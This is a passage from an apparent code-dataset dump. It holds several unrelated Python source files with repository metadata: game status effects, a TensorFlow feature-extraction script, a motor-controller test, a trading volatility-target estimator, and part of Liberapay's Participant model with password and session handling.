__init__(self,turns,amount):\n\t\tsuper(Maim,self).__init__()\n\t\tself.turns = turns\n\t\tself.amount = amount\n\t\tself.name = 'maim'\n\n\tdef do_turn(self,option):\n\t\tif self.turns > 0:\n\t\t\tself.owner.action_points -= self.amount\n\t\t\tself.turns -= 1\n\t\telse:\n\t\t\tself.owner.statuses.remove(self)\n\n\tdef to_str(self):\n\t\treturn self.name\n\nclass Sleep(base.Entity):\n\tdef __init__(self):\n\t\tsuper(Sleep,self).__init__()\n\n\tdef do_turn(self,options):\n\n\t\tchance=base.D20.roll()\n\t\tif chance>16:\n\t\t\tself.owner.statuses.remove(self)\n\t\t\tbase.put('[STATUS] %s has awoken!' % (self.owner.to_str()))\n\t\telse:\n\t\t\tbase.put('[STATUS] %s is asleep, and cannot move!' % (self.owner.to_str()))\n\t\t\tself.owner.action_points =0\n\n\nclass Blind(base.Entity):\n\tdef __init__(self,turns):\n\t\tsuper(Blind,self).__init__()\n\t\tself.turns = turns\n\n\tdef do_turn(self,options):\n\t\tbase.put('[STATUS] %s is blinded, and will not hit!' % self.owner.to_str())\n\t\tif self.turns > 0:\n\t\t\tself.owner.action_points = 0\n\t\t\tself.turns -= 1\n\t\telse:\n\t\t\tself.owner.statuses.remove(self)\n\nclass Burn(base.Entity):\n\tdef __init__(self,turns,damage):\n\t\tsuper(Burn,self).__init__()\n\t\tself.turns = turns\n\t\tself.damage = damage\n\t\tself.name = 'burn'\n\n\tdef do_turn(self,option):\n\t\tif self.turns > 0:\n\t\t\tself.owner.health -= self.damage\n\t\t\tbase.put('[STATUS] %s takes %f burn damage' % (self.owner.name,self.damage))\n\t\t\tself.turns -= 1\n\t\telse:\n\t\t\tself.owner.statuses.remove(self)\n\n\tdef to_str(self):\n\t\treturn self.name\n\nclass Cooldown(base.Entity):\n\tdef __init__(self,spell,turns):\n\t\tsuper(Cooldown,self).__init__()\n\t\tself.spell = spell\n\t\tself.turns = turns\n\t\tself.spell.on_cooldown = True\n\n\tdef do_turn(self,option):\n\t\tif self.turns > 0:\n\t\t\tself.turns -= 1\n\t\telse:\n\t\t\tself.spell.on_cooldown = False\n\t\t\tself.owner.statuses.remove(self)\n","repo_name":"johndikeman/dunces-and-dungeons","sub_path":"entity/status/player_statuses.py","file_name":"player_statuses.py","file_ext":"py","file_size_in_byte":3690,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"14336243991","text":"import BasicFunction as bf\r\nimport Blocks as bs\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\nimport numpy as np\r\nimport re\r\nimport math\r\n\r\n\r\n\r\ndef Encoder(inputTensor,outputChannels,blockName):\r\n with tf.variable_scope(blockName):\r\n conv1x1_1 = bs.SmallUniteConvolutionBlock(inputTensor,kernalSize=1,\r\n outChannels=64,gNum=4,blockName=\"Conv1x1_Encoder_First_Step\")\r\n Transformer_E_2 = bs.TransformerEncoderBlock(conv1x1_1,outputChannels=64,\r\n blockName=\"Transformer_Encoder_Second_Step\")\r\n conv1x1_3 = bs.TransChannelsConvolutionBlock(Transformer_E_2,kernalSize=1,\r\n outChannels=outputChannels,blockName=\"Conv1x1_Encoder_Third_Step\")\r\n pool_Down = bf.Pooling(conv1x1_3,windowShape=[2,2],poolingType=\"MAX\",stride=[2,2],name=\"Pooling_Encoder_Fourth_Step\")\r\n return conv1x1_1,Transformer_E_2,conv1x1_3 , pool_Down\r\n\r\ndef Decoder(inputTensor , outputSize , blockName):\r\n with tf.variable_scope(blockName):\r\n conv1x1_1 = bs.SmallUniteConvolutionBlock(inputTensor,kernalSize=1,\r\n outChannels=128,gNum=4,blockName=\"Conv1x1_Decoder_First_Step\")\r\n conv1x1_2 = bs.SmallUniteConvolutionBlock(conv1x1_1,kernalSize=1,\r\n outChannels=64,gNum=4,blockName=\"Conv1x1_Decoder_Second_Step\")\r\n globalPooling = keras.layers.GlobalAvgPool2D(data_format=\"channels_first\",name=\"AVG_Global_Decoder\")(conv1x1_2)\r\n weight1 = bf.WeightCreation(shape=[64,128],name=\"TransWeight1\")\r\n bias1 = tf.constant(value=0.,dtype=tf.float32,shape=[128],name=\"Bias1\")\r\n layer1 = keras.layers.PReLU(trainable=True)(tf.add(tf.matmul(globalPooling,weight1),bias1))\r\n weight2 = bf.WeightCreation(shape=[128,outputSize],name=\"TransWeight2\")\r\n bias2 = tf.constant(value=0.,dtype=tf.float32,shape=[outputSize],name=\"Bias2\")\r\n outputTensor = tf.add(tf.matmul(layer1,weight2),bias2)\r\n return outputTensor\r\n\r\ndef generateData(MapG):\r\n while True :\r\n for k in MapG:\r\n yield MapG[k]\r\n\r\ndef Min_Max_Nor(nums):\r\n minNum = np.min(nums)\r\n maxNum = np.max(nums)\r\n distence = maxNum - minNum + 0.0\r\n return (nums - minNum) / distence + 0.0001\r\n\r\nif __name__ == \"__main__\":\r\n np.set_printoptions(suppress=True)\r\n ### Config parameters\r\n batchSize = 6\r\n resultSize = 2\r\n featureChannels = 1\r\n epoch = 10\r\n timesInOneEpoch = 3500\r\n lr = 0.001\r\n displayTimes = 30\r\n decayStep = 1700\r\n decayRate = 0.96\r\n dataTrainFilePath = \"d:\\\\CandidateThresholdTrain.txt\"\r\n dataTestFilePath = \"d:\\\\CandidateThresholdTest.txt\"\r\n modelTrainOrTest = \"test\"\r\n saveModelSteps = 3498\r\n saveModelPath = \"d:\\\\featureExtractSavePath\\\\\"\r\n saveResultPath = \"d:\\\\featureResult.txt\"\r\n ### Net construction\r\n inputDataPlaceHolder = tf.placeholder(dtype=tf.float32,shape=[None,1,4,4])\r\n labelDataPlaceHolder = tf.placeholder(dtype=tf.float32,shape=[None,resultSize])\r\n lrPlaceHolder = tf.placeholder(dtype=tf.float32)\r\n conv1,trans , conv3 , featureTensor = Encoder(inputDataPlaceHolder,outputChannels=featureChannels,blockName=\"EncoderNet\")\r\n predictTensor = Decoder(featureTensor,outputSize=resultSize,blockName=\"DecoderNet\")\r\n different = tf.nn.softmax_cross_entropy_with_logits_v2(labels=labelDataPlaceHolder,logits=predictTensor,dim=1,name=\"CrossDis\")\r\n labelLoss = tf.reduce_mean(different,name=\"ReduceMean\")\r\n tf.add_to_collection(\"Loss\",labelLoss)\r\n tLoss = tf.add_n(tf.get_collection(\"Loss\"))\r\n with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\r\n optim = tf.train.MomentumOptimizer(learning_rate=lrPlaceHolder,momentum=0.9,use_nesterov=True).minimize(tLoss)\r\n tf.summary.FileWriter(logdir=saveModelPath, graph=tf.get_default_graph())\r\n print(\"Complete Net Build .\")\r\n ### Training data\r\n with tf.Session() as sess :\r\n if modelTrainOrTest.lower() == \"train\":\r\n sess.run(tf.global_variables_initializer())\r\n sess.run(tf.local_variables_initializer())\r\n print(\"Initial has completed .\")\r\n trainingNum = 0\r\n ### Read and use Min-Max score to Normalization data\r\n dataPInputMap = {}\r\n dataPLabelMap = {}\r\n dataNInputMap = {}\r\n dataNLabelMap = {}\r\n dataID2Arg = {}\r\n with open(file=dataTrainFilePath, mode=\"r\") as f:\r\n for i, line in enumerate(f):\r\n if i != 0:\r\n inputData = re.split(pattern=\"\\t\", string=line)\r\n label = int(inputData[4])\r\n idStr = inputData[:4]\r\n dataID2Arg[i] = idStr\r\n if label == 1:\r\n top2 = np.array(inputData[5:7], dtype=np.float32) * 1000.\r\n final = np.array(inputData[7:], dtype=np.float32)\r\n m = np.array(list(top2) + list(final), dtype=np.float32)\r\n m = Min_Max_Nor(m)\r\n m = [0.] + list(m) + [0.]\r\n m = np.array(m, dtype=np.float32)\r\n m = np.reshape(m, newshape=[1, 4, 4])\r\n dataPInputMap[i] = m\r\n dataPLabelMap[i] = np.array([0, 1], dtype=np.float32)\r\n if label == 0:\r\n top2 = np.array(inputData[5:7], dtype=np.float32) * 1000.\r\n final = np.array(inputData[7:], dtype=np.float32)\r\n m = np.array(list(top2) + list(final), dtype=np.float32)\r\n m = Min_Max_Nor(m)\r\n m = [0.] + list(m) + [0.]\r\n m = np.array(m, dtype=np.float32)\r\n m = np.reshape(m, newshape=[1, 4, 4])\r\n dataNInputMap[i] = m\r\n dataNLabelMap[i] = np.array([1, 0], dtype=np.float32)\r\n print(\"Read data has completed .\")\r\n dataPYield = generateData(dataPInputMap)\r\n labelPYield = generateData(dataPLabelMap)\r\n dataNYield = generateData(dataNInputMap)\r\n labelNYield = generateData(dataNLabelMap)\r\n for _ in range(epoch):\r\n for _ in range(timesInOneEpoch):\r\n dataInputs = []\r\n dataLabels = []\r\n for b in range(batchSize // 2):\r\n dataPInput = dataPYield.__next__()\r\n dataPLabel = labelPYield.__next__()\r\n dataNInput = dataNYield.__next__()\r\n dataNLabel = labelNYield.__next__()\r\n dataInputs.append(dataPInput)\r\n dataInputs.append(dataNInput)\r\n dataLabels.append(dataPLabel)\r\n dataLabels.append(dataNLabel)\r\n dataInputs = np.array(dataInputs)\r\n dataLabels = np.array(dataLabels)\r\n # print(\"Inputs \",dataInputs)\r\n # print(\"Labels \",dataLabels)\r\n if trainingNum % displayTimes == 0:\r\n tLossNum = sess.run(tLoss, feed_dict={\r\n inputDataPlaceHolder: dataInputs,\r\n labelDataPlaceHolder: dataLabels,\r\n lrPlaceHolder: lr\r\n })\r\n predictTensorNum = sess.run(predictTensor, feed_dict={\r\n inputDataPlaceHolder: dataInputs\r\n })\r\n featureTensorNum = sess.run(featureTensor, feed_dict={\r\n inputDataPlaceHolder: dataInputs\r\n })\r\n conv3Num = sess.run(conv3, feed_dict={\r\n inputDataPlaceHolder: dataInputs\r\n })\r\n transNum = sess.run(trans, feed_dict={\r\n inputDataPlaceHolder: dataInputs\r\n })\r\n labelLossNum = sess.run(labelLoss, feed_dict={\r\n inputDataPlaceHolder: dataInputs,\r\n labelDataPlaceHolder: dataLabels\r\n })\r\n print(\"trans is \", transNum)\r\n print(\"conv3 is \", conv3Num)\r\n print(\"Feature tensor is \", featureTensorNum)\r\n print(\"It has trained \" + str(trainingNum) + \" times .\")\r\n print(\"Learning rate is \", lr)\r\n print(\"Total losses are \", tLossNum)\r\n print(\"Label loss is \", labelLossNum)\r\n print(\"Predict labels are \", predictTensorNum)\r\n print(\"True Labels are \", dataLabels)\r\n sess.run(optim, feed_dict={\r\n inputDataPlaceHolder: dataInputs,\r\n labelDataPlaceHolder: dataLabels,\r\n lrPlaceHolder: lr\r\n })\r\n trainingNum = trainingNum + 1\r\n if trainingNum % decayStep == 0 and trainingNum != 0:\r\n lr = lr * math.pow(decayRate, trainingNum / decayStep + 0.0)\r\n if trainingNum % saveModelSteps == 0 and trainingNum != 0:\r\n tf.train.Saver().save(sess=sess, save_path=saveModelPath + \"model.ckpt\")\r\n tf.summary.FileWriter(logdir=saveModelPath, graph=tf.get_default_graph(),\r\n session=sess)\r\n else:\r\n tf.train.Saver().restore(sess=sess,\r\n save_path=saveModelPath + \"model.ckpt\")\r\n print(\"Initial has completed .\")\r\n ### Read and use Min-Max score to Normalization data\r\n dataPInputMap = {}\r\n dataPLabelMap = {}\r\n dataNInputMap = {}\r\n dataNLabelMap = {}\r\n dataID2Arg = {}\r\n with open(file=dataTestFilePath, mode=\"r\") as f:\r\n for i, line in enumerate(f):\r\n if i != 0:\r\n inputData = re.split(pattern=\"\\t\", string=line)\r\n label = int(inputData[4])\r\n idStr = inputData[:4]\r\n dataID2Arg[i] = idStr\r\n if label == 1:\r\n top2 = np.array(inputData[5:7], dtype=np.float32) * 1000.\r\n final = np.array(inputData[7:], dtype=np.float32)\r\n m = np.array(list(top2) + list(final), dtype=np.float32)\r\n m = Min_Max_Nor(m)\r\n m = [0.] + list(m) + [0.]\r\n m = np.array(m, dtype=np.float32)\r\n m = np.reshape(m, newshape=[1, 4, 4])\r\n dataPInputMap[i] = m\r\n dataPLabelMap[i] = np.array([0, 1], dtype=np.float32)\r\n if label == 0:\r\n top2 = np.array(inputData[5:7], dtype=np.float32) * 1000.\r\n final = np.array(inputData[7:], dtype=np.float32)\r\n m = np.array(list(top2) + list(final), dtype=np.float32)\r\n m = Min_Max_Nor(m)\r\n m = [0.] + list(m) + [0.]\r\n m = np.array(m, dtype=np.float32)\r\n m = np.reshape(m, newshape=[1, 4, 4])\r\n dataNInputMap[i] = m\r\n dataNLabelMap[i] = np.array([1, 0], dtype=np.float32)\r\n print(\"Read data has completed .\")\r\n totSamples = 0\r\n TP = 0\r\n TN = 0\r\n FP = 0\r\n FN = 0\r\n with open(saveResultPath,mode=\"w\") as w :\r\n for kv in dataPInputMap:\r\n testInput = np.reshape(dataPInputMap[kv], newshape=[1, 1, 4, 4])\r\n testLabel = dataPLabelMap[kv]\r\n featureTestNum = sess.run(featureTensor, feed_dict={\r\n inputDataPlaceHolder: testInput\r\n })\r\n predictTestNum = sess.run(predictTensor, feed_dict={\r\n inputDataPlaceHolder: testInput\r\n })\r\n totSamples = totSamples + 1\r\n IDString = dataID2Arg[kv]\r\n featureFlatten = np.reshape(np.array(featureTestNum,dtype=np.float32), newshape=[4])\r\n if np.argmax(predictTestNum) == np.argmax(testLabel):\r\n w.write(str(IDString) + \" TRUE \" + \" 1 \" + str(featureFlatten) + \"\\n\")\r\n TP = TP + 1\r\n print(kv)\r\n else:\r\n w.write(str(IDString) + \" FALSE \" + \" 1 \" + str(featureFlatten) + \"\\n\")\r\n FN = FN + 1\r\n print(kv)\r\n\r\n for kv in dataNInputMap:\r\n testInput = np.reshape(dataNInputMap[kv], newshape=[1, 1, 4, 4])\r\n testLabel = dataNLabelMap[kv]\r\n featureTestNum = sess.run(featureTensor, feed_dict={\r\n inputDataPlaceHolder: testInput\r\n })\r\n predictTestNum = sess.run(predictTensor, feed_dict={\r\n inputDataPlaceHolder: testInput\r\n })\r\n totSamples = totSamples + 1\r\n IDString = dataID2Arg[kv]\r\n featureFlatten = np.reshape(np.array(featureTestNum,dtype=np.float32), newshape=[4])\r\n if np.argmax(predictTestNum) == np.argmax(testLabel):\r\n w.write(str(IDString) + \" TRUE \" + \" 0 \" + str(featureFlatten) + \"\\n\")\r\n print(kv)\r\n TN = TN + 1\r\n else:\r\n w.write(str(IDString) + \" FALSE \" + \" 0 \" + str(featureFlatten) + \"\\n\")\r\n print(kv)\r\n FP = FP + 1\r\n print(\"Acc ratio is \",(TP + TN) / totSamples + 0.)\r\n print(\"Sensitive ratio is \", TP / (TP + FN) + 0.)\r\n print(\"Specificity ratio is \",TN / (TN + FP) + 0.)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"zoubohao/Use-Diversity-Convolution-Blocks-To-Simulate-Transformer-Feature-Extraction","sub_path":"FeatureExtract.py","file_name":"FeatureExtract.py","file_ext":"py","file_size_in_byte":14659,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"33207083634","text":"import os\nimport time\nfrom datetime import datetime\nfrom roboclaw_zwv import Roboclaw_zwv\n\nserial_port = \"/dev/ttyACM0\"\nbaud_rate = 38400\naddress = 0x80\nlog_file_dir = \"../../Logs\"\n \ntry:\n roboclaw = Roboclaw_zwv(serial_port, baud_rate)\n if not roboclaw.Open():\n raise Exception(f\"Unable to open port {serial_port}\")\n \n roboclaw.execute_buffered_commands_with_logging(address,\n [\n lambda : roboclaw.SpeedDistanceM1(address, 200, 1400, 0),\n lambda : roboclaw.SpeedDistanceM1(address, 100, 50, 0)\n ],\n 2,\n 2\n )\n roboclaw.graph_metrics(roboclaw.log_file.name)\n \nfinally:\n if roboclaw._port.is_open:\n roboclaw._port.close()\n\n\n","repo_name":"7Gaming/ZeroWasteVending","sub_path":"test_roboclaw.py","file_name":"test_roboclaw.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6574528865","text":"import pandas as pd\nimport tqdm\n\nfrom melo_fwk.basket.strat_basket import StratBasket\nfrom melo_fwk.estimators.base_estimator import MeloBaseEstimator\nfrom melo_fwk.pose_size.vol_target import VolTarget\nfrom melo_fwk.trading_systems import TradingSystemIter\nfrom melo_fwk.market_data.product import Product\n\nclass VolTargetEstimator(MeloBaseEstimator):\n\t\"\"\"\n\tVolTargetEstimator class is a subclass of the MeloBaseEstimator class. It is used to optimize the\n\tvolatility target for a trading system.\n\t\"\"\"\n\n\tdef __init__(self, **kwargs):\n\t\t\"\"\"\n\t\tConstructor for the VolTargetEstimator class. Calls the constructor of the parent class MeloBaseEstimator\n\t\tand initializes the logger.\n\t\tIt also initializes the following instance variables:\n\t\t\ttrading_capital: The trading capital for the trading system.\n\t\t\tstep: The step size for incrementing the volatility target.\n\t\t\tstart: The starting value for the volatility target.\n\t\t\tfinal: The final value for the volatility target.\n\t\t\"\"\"\n\t\tsuper(VolTargetEstimator, self).__init__(**kwargs)\n\t\tself.trading_capital = self.estimator_params_dict.get(\n\t\t\t\"trading_capital\", self.size_policy.vol_target.trading_capital)\n\t\tself.step = self.estimator_params_dict.get(\"step\", 0.1)\n\t\tself.start = self.estimator_params_dict.get(\"start\", 0.1)\n\t\tself.final = self.estimator_params_dict.get(\"final\", 1.)\n\t\tself.logger.info(\"Initialized Estimator\")\n\n\tdef run(self):\n\t\t\"\"\"\n\t\tRuns the volatility target optimization for all products in the products dictionary of the VolTargetEstimator instance.\n\t\tReturns a dictionary of data frames containing the optimization results for each product.\n\t\t\"\"\"\n\t\toutput_dict = dict()\n\t\tself.logger.info(f\"Running Estimatior on {len(self.products)} Products\")\n\t\tfor i, (product_name, product_dataclass) in tqdm.tqdm(enumerate(self.products.items()), leave=False):\n\t\t\toutput_dict[product_name] = self._trade_product(product_dataclass)\n\t\tself.logger.info(\"Finished running estimator\")\n\n\t\treturn output_dict\n\n\tdef _trade_product(self, product: Product):\n\t\t\"\"\"\n\t\tOptimizes the volatility target for a given product.\n\t\tReturns a data frame containing the optimization results.\n\t\t\"\"\"\n\t\tsize_policy = self.size_policy\n\t\tsize_policy.vol_target = VolTarget(\n\t\t\tannual_vol_target=self.start,\n\t\t\ttrading_capital=self.trading_capital\n\t\t)\n\t\tresults = list()\n\n\t\tn_iter = int((self.final - self.start) / self.step)\n\t\tfor _ in tqdm.tqdm(range(n_iter), leave=False):\n\t\t\tts = TradingSystemIter(\n\t\t\t\tstrat_basket=StratBasket(\n\t\t\t\t\tstrat_list=self.strategies,\n\t\t\t\t\tweights=self.forecast_weights,\n\t\t\t\t),\n\t\t\t\tsize_policy=size_policy,\n\t\t\t)\n\t\t\ttsar = ts.run_product(product)\n\n\t\t\tresults.append({\n\t\t\t\t\"vol_target\": size_policy.vol_target.annual_vol_target,\n\t\t\t\t\"gar\": tsar.gar(), # get geometric returns\n\t\t\t})\n\t\t\tsize_policy.update_annual_vol_target(self.step)\n\n\t\treturn pd.DataFrame(results)\n","repo_name":"omarboukhris/melo-fwk","sub_path":"melo_fwk/estimators/vol_target_estimator.py","file_name":"vol_target_estimator.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17076474432","text":"from __future__ import print_function, unicode_literals\n\nfrom base64 import b64decode, b64encode\nfrom decimal import Decimal, ROUND_DOWN\nfrom email.utils import formataddr\nfrom hashlib import pbkdf2_hmac, md5\nfrom os import urandom\nimport pickle\nfrom time import sleep\nimport uuid\n\nfrom six.moves.urllib.parse import urlencode\n\nfrom aspen.utils import utcnow\nimport aspen_jinja2_renderer\nfrom markupsafe import escape as htmlescape\nfrom postgres.orm import Model\nfrom psycopg2 import IntegrityError\nfrom psycopg2.extras import Json\n\nfrom liberapay.billing import mangoapi\nfrom liberapay.constants import (\n ASCII_ALLOWED_IN_USERNAME, AVATAR_QUERY, EMAIL_RE,\n EMAIL_VERIFICATION_TIMEOUT, MAX_TIP,\n MIN_TIP, PASSWORD_MAX_SIZE, PASSWORD_MIN_SIZE, SESSION, SESSION_REFRESH,\n SESSION_TIMEOUT, USERNAME_MAX_SIZE\n)\nfrom liberapay.exceptions import (\n BadAmount,\n BadEmailAddress,\n BadPasswordSize,\n CannotRemovePrimaryEmail,\n EmailAlreadyTaken,\n EmailNotVerified,\n NonexistingElsewhere,\n NoSelfTipping,\n NoTippee,\n TooManyEmailAddresses,\n UserDoesntAcceptTips,\n UsernameAlreadyTaken,\n UsernameContainsInvalidCharacters,\n UsernameIsEmpty,\n UsernameIsRestricted,\n UsernameTooLong,\n)\nfrom liberapay.models._mixin_team import MixinTeam\nfrom liberapay.models.account_elsewhere import AccountElsewhere\nfrom liberapay.models.community import Community\nfrom liberapay.models.exchange_route import ExchangeRoute\nfrom liberapay.notifications import EVENTS\nfrom liberapay.security.crypto import constant_time_compare\nfrom liberapay.utils import (\n b64encode_s, erase_cookie, serialize, set_cookie,\n emails, i18n,\n)\nfrom liberapay.website import website\n\n\nclass Participant(Model, MixinTeam):\n\n typname = 'participants'\n\n ANON = False\n\n def __eq__(self, other):\n if not isinstance(other, Participant):\n return False\n return self.id == other.id\n\n def __ne__(self, other):\n if not isinstance(other, Participant):\n return True\n return self.id != other.id\n\n def __repr__(self):\n return '' % (repr(self.id), repr(self.username))\n\n\n # Constructors\n # ============\n\n @classmethod\n def make_stub(cls, cursor=None, **kw):\n \"\"\"Return a new stub participant.\n \"\"\"\n if kw:\n cols, vals = zip(*kw.items())\n cols = ', '.join(cols)\n placeholders = ', '.join(['%s']*len(vals))\n x = '({0}) VALUES ({1})'.format(cols, placeholders)\n else:\n x, vals = 'DEFAULT VALUES', ()\n with cls.db.get_cursor(cursor) as c:\n return c.one(\"\"\"\n INSERT INTO participants {0}\n RETURNING participants.*::participants\n \"\"\".format(x), vals)\n\n @classmethod\n def make_active(cls, username, kind, password, cursor=None):\n \"\"\"Return a new active participant.\n \"\"\"\n now = utcnow()\n d = {\n 'kind': kind,\n 'status': 'active',\n 'password': cls.hash_password(password),\n 'password_mtime': now,\n 'join_time': now,\n }\n cols, vals = zip(*d.items())\n cols = ', '.join(cols)\n placeholders = ', '.join(['%s']*len(vals))\n with cls.db.get_cursor(cursor) as c:\n p = c.one(\"\"\"\n INSERT INTO participants ({0}) VALUES ({1})\n RETURNING participants.*::participants\n \"\"\".format(cols, placeholders), vals)\n p.change_username(username, c)\n return p\n\n def make_team(self, name, email=None):\n with self.db.get_cursor() as c:\n t = c.one(\"\"\"\n INSERT INTO participants\n (kind, status, join_time)\n VALUES ('group', 'active', now())\n RETURNING participants.*::participants\n \"\"\")\n t.change_username(name, c)\n t.add_member(self, c)\n if email:\n t.add_email(email)\n return t\n\n @classmethod\n def from_id(cls, id):\n \"\"\"Return an existing participant based on id.\n \"\"\"\n return cls._from_thing(\"id\", id)\n\n @classmethod\n def from_username(cls, username):\n \"\"\"Return an existing participant based on username.\n \"\"\"\n return cls._from_thing(\"lower(username)\", username.lower())\n\n @classmethod\n def _from_thing(cls, thing, value):\n assert thing in (\"id\", \"lower(username)\", \"mangopay_user_id\", \"email\")\n if thing == 'email':\n # This query looks for an unverified address if the participant\n # doesn't have any verified address\n return cls.db.one(\"\"\"\n SELECT p.*::participants\n FROM emails e\n JOIN participants p ON p.id = e.participant\n WHERE e.address = %s\n AND (p.email IS NULL OR p.email = e.address)\n \"\"\", (value,))\n return cls.db.one(\"\"\"\n SELECT participants.*::participants\n FROM participants\n WHERE {}=%s\n \"\"\".format(thing), (value,))\n\n @classmethod\n def authenticate(cls, k1, k2, v1=None, v2=None):\n assert k1 in ('id', 'username', 'email')\n if not (v1 and v2):\n return\n if k1 == 'username':\n k1 = 'lower(username)'\n v1 = v1.lower()\n p = cls._from_thing(k1, v1)\n if not p:\n return\n if k2 == 'session':\n if not p.session_token:\n return\n if p.session_expires < utcnow():\n return\n if constant_time_compare(p.session_token, v2):\n p.authenticated = True\n return p\n elif k2 == 'password':\n if not p.password:\n return\n algo, rounds, salt, hashed = p.password.split('$', 3)\n rounds = int(rounds)\n salt, hashed = b64decode(salt), b64decode(hashed)\n if cls._hash_password(v2, algo, salt, rounds) == hashed:\n p.authenticated = True\n return p\n\n def refetch(self):\n return self._from_thing('id', self.id)\n\n\n # Password Management\n # ===================\n\n @staticmethod\n def _hash_password(password, algo, salt, rounds):\n return pbkdf2_hmac(algo, password.encode('utf8'), salt, rounds)\n\n @classmethod\n def hash_password(cls, password):\n l = len(password)\n if l < PASSWORD_MIN_SIZE or l > PASSWORD_MAX_SIZE:\n raise BadPasswordSize\n algo = 'sha256'\n salt = urandom(21)\n rounds = website.app_conf.password_rounds\n hashed = cls._hash_password(password, algo, salt, rounds)\n hashed = '$'.join((algo, str(rounds), b64encode(salt), b64encode(hashed)))\n return hashed\n\n def update_password(self, password, cursor=None):\n hashed = self.hash_password(password)\n p_id = self.id\n with self.db.get_cursor(cursor) as c:\n c.run(\"\"\"\n UPDATE participants\n SET password = %(hashed)s\n , password_mtime = CURRENT_TIMESTAMP\n WHERE id = %(p_id)s;\n \"\"\", locals())\n\n\n # Session Management\n # ==================\n\n def update_session(self, new_token, expires):\n \"\"\"Set ``session_token`` and ``session_expires``.\n \"\"\"\n self.db.run(\"\"\"\n UPDATE participants\n SET session_token=%s\n , session_expires=%s\n WHERE id=%s\n \"\"\", (new_token, expires, self.id))\n self.set_attributes(session_token=new_token, session_expires=expires)\n\n def set_session_expires(self, expires):\n \"\"\"Set ``session_expires`` to the given datetime.\n \"\"\"\n self.db.run( \"UPDATE participants SET session_expires=%s \"\n \"WHERE id=%s\"\n , (expires, self.id,)\n )\n self.set_attributes(session_expires=expires)\n\n def start_session(self, suffix=''):\n \"\"\"Start a new session for the user, invalidating the previous one.\n \"\"\"\n token = uuid.uuid4().hex + suffix\n expires = utcnow() + SESSION_TIMEOUT\n self.update_session(token, expires)\n\n def sign_in(self, cookies, suffix=''):\n assert self.authenticated\n self.start_session(suffix)\n creds = '%s:%s' % (self.id, self.session_token)\n set_cookie(cookies, SESSION, creds, self.session_expires)\n\n def keep_signed_in(self, cookies):\n \"\"\"Extend the user's current session.\n \"\"\"\n new_expires = utcnow() + SESSION_TIMEOUT\n if new_expires - self.session_expires > SESSION_REFRESH:\n self.set_session_expires(new_expires)\n token = self.session_token\n creds = '%s:%s' % (self.id, token)\n set_cookie(cookies, SESSION, creds, expires=new_expires)\n\n def sign_out(self, cookies):\n \"\"\"End the user's current session.\n \"\"\"\n self.update_session(None, None)\n erase_cookie(cookies, SESSION)\n\n\n # Statement\n # =========\n\n def get_statement(self, langs, type='profile'):\n \"\"\"Get the participant's statement in the language that best matches\n the list provided.\n \"\"\"\n p_id = self.id\n return self.db.one(\"\"\"\n SELECT content, lang\n FROM statements\n JOIN enumerate(%(langs)s) langs ON langs.value = statements.lang\n WHERE participant = %(p_id)s\n AND type = %(type)s\n ORDER BY langs.rank\n LIMIT 1\n \"\"\", locals(), default=(None, None))\n\n def get_statement_langs(self, type='profile'):\n return self.db.all(\"\"\"\n SELECT lang FROM statements WHERE participant=%s AND type=%s\n \"\"\", (self.id, type))\n\n def upsert_statement(self, lang, statement, type='profile'):\n if not statement:\n self.db.run(\"\"\"\n DELETE FROM statements\n WHERE participant=%s\n AND type=%s\n AND lang=%s\n \"\"\", (self.id, type, lang))\n return\n r = self.db.one(\"\"\"\n UPDATE statements\n SET content=%s\n WHERE participant=%s\n AND type=%s\n AND lang=%s\n RETURNING true\n \"\"\", (statement, self.id, type, lang))\n if not r:\n search_conf = i18n.SEARCH_CONFS.get(lang, 'simple')\n try:\n self.db.run(\"\"\"\n INSERT INTO statements\n (lang, content, participant, search_conf, type)\n VALUES (%s, %s, %s, %s, %s)\n \"\"\", (lang, statement, self.id, search_conf, type))\n except IntegrityError:\n return self.upsert_statement(lang, statement)\n\n\n # Pricing\n # =======\n\n @property\n def usage(self):\n return max(self.giving, self.receiving)\n\n @property\n def suggested_payment(self):\n return (self.usage * Decimal('0.05')).quantize(Decimal('.01'))\n\n\n # Stubs\n # =====\n\n def resolve_stub(self):\n rec = self.db.one(\"\"\"\n SELECT platform, user_name\n FROM elsewhere\n WHERE participant = %s\n \"\"\", (self.id,))\n return rec and '/on/%s/%s/' % (rec.platform, rec.user_name)\n\n\n # Closing\n # =======\n\n class AccountNotEmpty(Exception): pass\n\n def final_check(self, cursor):\n \"\"\"Sanity-check that balance and tips have been dealt with.\n \"\"\"\n if self.balance != 0:\n raise self.AccountNotEmpty\n incoming = cursor.one(\"\"\"\n SELECT count(*) FROM current_tips WHERE tippee = %s AND amount > 0\n \"\"\", (self.id,))\n if incoming > 0:\n raise self.AccountNotEmpty\n\n class UnknownDisbursementStrategy(Exception): pass\n\n def close(self, disbursement_strategy):\n \"\"\"Close the participant's account.\n \"\"\"\n with self.db.get_cursor() as cursor:\n if disbursement_strategy == None:\n pass # No balance, supposedly. final_check will make sure.\n elif disbursement_strategy == 'downstream':\n # This in particular needs to come before clear_tips_giving.\n self.distribute_balance_as_final_gift(cursor)\n else:\n raise self.UnknownDisbursementStrategy\n\n self.clear_tips_giving(cursor)\n self.clear_tips_receiving(cursor)\n self.clear_takes(cursor)\n if self.kind == 'group':\n self.remove_all_members(cursor)\n self.clear_personal_information(cursor)\n self.final_check(cursor)\n self.update_status('closed', cursor)\n\n class NoOneToGiveFinalGiftTo(Exception): pass\n\n def distribute_balance_as_final_gift(self, cursor):\n \"\"\"Distribute a balance as a final gift.\n \"\"\"\n if self.balance == 0:\n return\n\n tips, total, _, _= self.get_giving_for_profile()\n transfers = []\n distributed = Decimal('0.00')\n\n for tip in tips:\n rate = tip.amount / total\n pro_rated = (self.balance * rate).quantize(Decimal('0.01'), ROUND_DOWN)\n if pro_rated == 0:\n continue\n distributed += pro_rated\n transfers.append([tip.tippee, pro_rated])\n\n if not transfers:\n raise 